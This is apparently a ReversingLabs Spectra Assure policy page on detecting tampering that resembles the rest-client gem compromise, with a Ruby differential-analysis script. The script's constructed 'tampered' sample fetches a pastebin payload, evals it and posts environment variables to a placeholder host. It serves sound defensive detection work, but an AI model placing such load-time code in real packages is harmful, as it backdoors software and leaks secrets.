TH20111
Detected indicators of tampering that resemble the rest-client software compromise.
| priority | CI/CD status | severity | effort | SAFE level | SAFE assessment |
|---|---|---|---|---|---|
| | fail | high | high | 1 | tampering: fail (Reason: indicators of tampering found) |
About the issue
Publicly disclosed software supply chain compromises can be modeled by the unique set of indicators of tampering each one exhibits. Those indicators form a heuristic signature that is evaluated during differential analysis to check that no similar attack has affected the package under inspection. In this case, inspecting how the package's behaviors changed across subsequent versions produced a match with the indicators of tampering that characterize the rest-client compromise. In that incident (August 2019), versions 1.6.10 through 1.6.13 of the rest-client Ruby gem were published to RubyGems from a compromised maintainer account; the injected code fetched a payload from pastebin.com at load time and evaluated it. Malicious actors are known to reuse attack patterns that succeeded in the past, and some deliberately emulate other attackers to misdirect incident responders, so a positive tampering match is not sufficient for attribution. It does, however, make it highly likely that the software package was tampered with by a malicious actor or a rogue insider.
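The differential analysis described above, as an added example rather than ReversingLabs' own signature logic: a small Ruby script that extracts a set of behaviors from two versions of a gem's source, keeps only the behaviors the later version introduced, and matches them against a hypothetical signature modeled on the rest-client pattern (code fetched at load time and passed to eval). The indicator catalogue, the signature, the sample gem sources and every URL in them are constructed for illustration; the product's real indicators are not published on this page.

```ruby
require 'set'

# A fetch expression: a call that returns the body of a remote resource.
FETCH_EXPR = /(?:Net::HTTP\.(?:get|get_response)|URI\.open)\s*\(/

# True when a remote response is passed to eval, either directly
# (optionally through a Base64 decode) or via an intermediate variable.
def remote_code_eval?(src)
  return true if src.match?(/\beval\s*\(\s*(?:Base64\.\w+\(\s*)?#{FETCH_EXPR}/)
  fetched_vars = src.scan(/^\s*(\w+)\s*=\s*#{FETCH_EXPR}/).flatten
  fetched_vars.any? do |var|
    src.match?(/\beval\s*\(\s*(?:Base64\.\w+\(\s*)?#{Regexp.escape(var)}\b/)
  end
end

# Hypothetical indicator catalogue (constructed for this example, not the
# product's real signature set). Each entry maps a behavior name to a check.
INDICATORS = {
  remote_code_eval: ->(src) { remote_code_eval?(src) },
  dynamic_eval:     ->(src) { src.match?(/\b(?:Kernel\.)?eval\s*\(/) },
  paste_site_fetch: ->(src) { src.match?(%r{https?://(?:[\w-]+\.)?(?:pastebin\.com|paste\.ee|hastebin\.com)/}) },
  env_harvest:      ->(src) { src.match?(/\bENV\.(?:to_h|to_a|map|each)\b/) },
  silent_rescue:    ->(src) { src.match?(/rescue\s+Exception\s*\n\s*end/) },
}.freeze

# Signature modeled on the rest-client pattern: the required behavior is
# evaluating fetched code; the supporting ones raise confidence only.
RESTCLIENT_LIKE = {
  name:       'rest-client-like: remote code fetched and evaluated',
  required:   Set[:remote_code_eval],
  supporting: Set[:paste_site_fetch, :env_harvest, :silent_rescue],
}.freeze

def behaviors(src)
  INDICATORS.each_with_object(Set.new) { |(name, check), acc| acc << name if check.call(src) }
end

# Differential step: only behaviors absent from the earlier version count.
def newly_introduced(old_src, new_src)
  behaviors(new_src) - behaviors(old_src)
end

# Returns a match hash when every required behavior was newly introduced, else nil.
def match_tampering(old_src, new_src, sig = RESTCLIENT_LIKE)
  added = newly_introduced(old_src, new_src)
  return nil unless sig[:required].subset?(added)
  { signature:  sig[:name],
    required:   (added & sig[:required]).to_a.sort,
    supporting: (added & sig[:supporting]).to_a.sort }
end

# Constructed sample: a clean release that legitimately uses Net::HTTP.
V1_CLEAN = <<~'RUBY'
  require 'net/http'
  module RestClient
    def self.get(url)
      Net::HTTP.get(URI(url))
    end
  end
RUBY

# Constructed sample: a benign update that adds a local eval. dynamic_eval
# appears, but nothing fetched is evaluated, so the signature must not fire.
V2_BENIGN = V1_CLEAN + <<~'RUBY'
  module RestClient
    TEMPLATE = 'response.body.upcase'
    def self.render(response)
      eval(TEMPLATE, binding)
    end
  end
RUBY

# Constructed sample modeled on the rest-client pattern: load-time code fetches
# a paste, evaluates it, posts the environment, and swallows every exception.
# Both URLs are placeholders.
V2_TAMPERED = V1_CLEAN + <<~'RUBY'
  begin
    payload = Net::HTTP.get(URI('https://pastebin.com/raw/EXAMPLE'))
    eval(payload)
    Net::HTTP.post_form(URI('https://collector.example.invalid/'), 'env' => ENV.to_h.to_s)
  rescue Exception
  end
RUBY

if __FILE__ == $PROGRAM_NAME
  p match_tampering(V1_CLEAN, V2_BENIGN)    # nil: a local eval alone is not the pattern
  p match_tampering(V1_CLEAN, V2_TAMPERED)  # match, with three supporting indicators
end
```

Two properties of this approach matter in practice. First, the library's legitimate use of Net::HTTP does not trigger anything by itself; the signature keys on the combination (fetched data reaching eval), which is why the benign update that merely adds an eval does not match. Second, the differential step needs a trustworthy baseline: comparing two already-tampered versions yields no newly introduced behaviors and therefore no match, so when a detection fires, the investigation should extend to the earlier versions in the release line rather than stop at the flagged one.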
How to resolve the issue
- Investigate the reported detections.
- Consult the MITRE ATT&CK documentation: T1195.001 - Compromise Software Dependencies and Development Tools.
- Investigate your build and release environment for signs of software supply chain compromise.
- Consider engaging an external incident response team to help find the root cause of the compromise.
- Delay the software release until the investigation is complete and the detection has been verified.
Incidence statistics
ReversingLabs periodically collects and analyzes the contents of popular software package repositories for threat research purposes. Analysis results are used to calculate incidence statistics for issues (policy violations) that Spectra Assure can detect in software packages.
This section is updated when new data becomes available.
Total number of packages analyzed
- RubyGems: 183K
- NuGet: 644K
- PyPI: 628K
- npm: 3.72M
Recommended reading
- T1195.001 - Compromise Software Dependencies and Development Tools (External resource - MITRE ATT&CK documentation)
- Backdoor Found in 'rest-client' Ruby Gem (External resource - SecurityWeek)